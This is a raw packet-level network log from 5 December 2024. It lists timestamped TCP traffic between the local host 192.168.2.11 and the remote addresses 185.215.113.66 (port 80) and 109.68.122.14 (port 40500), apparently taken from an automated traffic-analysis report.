                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.505670071 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.505731106 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.510107040 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.510164022 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.510171890 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.510204077 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.514507055 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.514583111 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.514642000 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.514684916 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.518999100 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.522031069 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:47.909708023 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:48.031405926 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:52.642520905 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:52.642676115 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:52.731421947 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.706743956 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.826596022 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.826698065 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.827510118 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.947967052 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247548103 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247575998 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247587919 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247601032 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247687101 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247698069 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247700930 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247714043 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247742891 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247745037 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247756004 CET8049747185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247766018 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247800112 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.249672890 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.249700069 CET4974780192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.444011927 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.777990103 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.778076887 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.788091898 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.908111095 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.996937037 CET4975740500192.168.2.11109.68.122.14
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.116940022 CET4050049757109.68.122.14192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.117024899 CET4975740500192.168.2.11109.68.122.14
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.118590117 CET4975740500192.168.2.11109.68.122.14
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.238374949 CET4050049757109.68.122.14192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.238445997 CET4975740500192.168.2.11109.68.122.14
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:58.360486984 CET4050049757109.68.122.14192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111695051 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111733913 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111763000 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111851931 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114202976 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114213943 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114226103 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114238977 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114283085 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114326954 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116379976 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116414070 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116424084 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116466999 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.119033098 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.119076014 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.231987953 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.232006073 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.232064009 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.308490038 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.309979916 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.585376978 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.705156088 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.705373049 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.706990004 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.827949047 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.410579920 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.530610085 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.848979950 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.849004984 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.849116087 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.849909067 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.849944115 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.850928068 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.851001978 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.851035118 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.851077080 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.858670950 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.858736038 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.858769894 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.858808994 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.866307974 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.866386890 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.866393089 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.866416931 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.873976946 CET8049756185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.874046087 CET4975680192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.059839010 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.059911013 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.059953928 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062495947 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062510014 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062521935 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062582970 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062583923 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.063236952 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064523935 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064537048 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064548969 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064609051 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064609051 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067538023 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067603111 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067692041 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067734957 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.180608034 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.180624008 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.180681944 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.184597015 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.184675932 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.194741011 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.194762945 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.194786072 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.194945097 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.253947020 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.254057884 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.254079103 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.254121065 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.258222103 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.258302927 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.258368015 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.258404970 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.266921043 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.266988039 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.267025948 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.267064095 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.275242090 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.275322914 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.275332928 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.275420904 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.283904076 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.283973932 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.284048080 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.284048080 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.292282104 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.292319059 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.292350054 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.292350054 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.300750971 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.300805092 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.300847054 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.300885916 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.309364080 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.309387922 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.309413910 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.309467077 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.316919088 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.316975117 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.317032099 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.317111969 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.324781895 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.324882984 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.324930906 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.324966908 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.333508968 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.333731890 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.427836895 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.427923918 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.428025007 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.428025007 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.431689024 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.431754112 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.446558952 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.446670055 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.446742058 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.446794033 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.448420048 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.448484898 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.449248075 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.449294090 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.449357033 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.449393034 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.453732967 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.453778982 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.453831911 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.453881025 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.458225012 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.458271980 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.458349943 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.458381891 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.462714911 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.462771893 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.462806940 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.462929964 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.467775106 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.467808962 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.467816114 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.467876911 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.471678019 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.471724987 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.471801043 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.471837997 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.476272106 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.476378918 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.476413965 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.476413965 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.480670929 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.480762005 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.480766058 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.483782053 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.485102892 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.485165119 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.485232115 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.487782955 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.489685059 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.489810944 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.489845991 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.489845991 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.494124889 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.494203091 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.494237900 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.494237900 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.498528957 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.498579979 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.498672962 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.498719931 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.502989054 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.503036976 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.503143072 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.503187895 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.507455111 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.507584095 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.507607937 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.507633924 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.511908054 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.511960983 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.512008905 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.512041092 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.516429901 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.516510963 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.516534090 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.516580105 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.520921946 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.520977974 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.521020889 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.521087885 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.525362968 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.525418043 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.525482893 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.525587082 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.529861927 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.529957056 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.529974937 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.530083895 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.534336090 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.534404039 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.620160103 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.620249987 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.620286942 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.620286942 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.622114897 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.622164965 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.622167110 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.622203112 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.625082016 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.625127077 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.625133991 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.625262976 CET4977580192.168.2.11185.215.113.66
